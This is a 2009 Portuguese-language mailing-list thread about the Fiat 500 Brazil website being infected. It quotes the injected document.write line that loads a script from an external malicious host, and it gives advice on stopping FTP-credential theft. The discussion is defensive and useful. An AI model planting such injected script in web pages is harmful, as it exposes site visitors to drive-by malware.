[GTER] Site Fiat 500 acusando virus

Marcelo Coelho marcelo at tpn.com.br
Tue Oct 20 14:11:45 -02 2009 

Olá Douglas,

Isso tem sido cada vez mais frequente.

Algum vírus infectou o computador da rede do pessoal que atualiza o  
site e capturou a senha de FTP.

Antigamente a estratégia do vírus era ler os arquivos .ini dos  
programas de FTP (WS_FTP, Filezilla etc). Agora estes vírus evoluiram  
e até mesmo sniffam a rede a procura de senhas de FTP. Uma vez  
encontrada a senha, o computador infectado notifica algum servidor  
remoto sobre qual esta senha.

E este servidor remoto delega outros computadores para alterarem o  
conteúdo do site. Primeiramente editavam somente arquivos index*.* e  
default*.*. Agora estes vírus editam diversos tipos de arquivo, entre  
eles .html, .asp, .php ,.js, incluindo uma tag <script> ou <iframe>,  
sempre puxando conteúdo de servidores externos.

Algumas precauções:

1) Utilizar SFTP ou SCP, para que a senha não seja trafegada em texto  
simples.
2) Não armazenar senhas nos programas de FTP. Usar, por exemplo, um  
gerenciador de senhas, como o KeyPass
3) Não usar hubs, porque os sniffers só capturarão as senhas se puder  
escutá-las na rede.
4) Para quem puder fazer isso, restringir o acesso FTP por IP. Por  
exemplo: se você só atualiza sites a partir de conexões Internet no  
Brasil, porque permitir o mundo inteiro logar no FTP com sua conta?
5) Terminar cada script ASP ou PHP com um comando para encerrar a  
execução da página. Uma página .asp, se terminar com Response.End,  
mesmo se for infectada, não exibirá o código malicioso adicionado ao  
final do arquivo pelo virus.


On 20/10/2009, at 13:45, Douglas C. de Campos wrote:

>     Ao entrar no site do Fiat 500 o meu antivirus alarmou. Olhando o  
> html
> da para ver que tem um java script que chama uma pagina externa   
> *wget -r
> http://www.fiat500.com.br*  dentro do *index.html* tem *<script
> type="text/javascript" src="js/swfobject.js"></script>* esse *
> js/swfobject.js* tem no final um d*ocument.write('<script src=
> http://lupitaarmas.com/media/index2.php ><\/script>' *  e essa  
> pagina já é
> reportada como suspeita pelo firefox.
>
> Abraços
> -- 
> Douglas Camargo de Campos
> 7375 - 8742
> --
> gter list    https://eng.registro.br/mailman/listinfo/gter

More information about the gter mailing list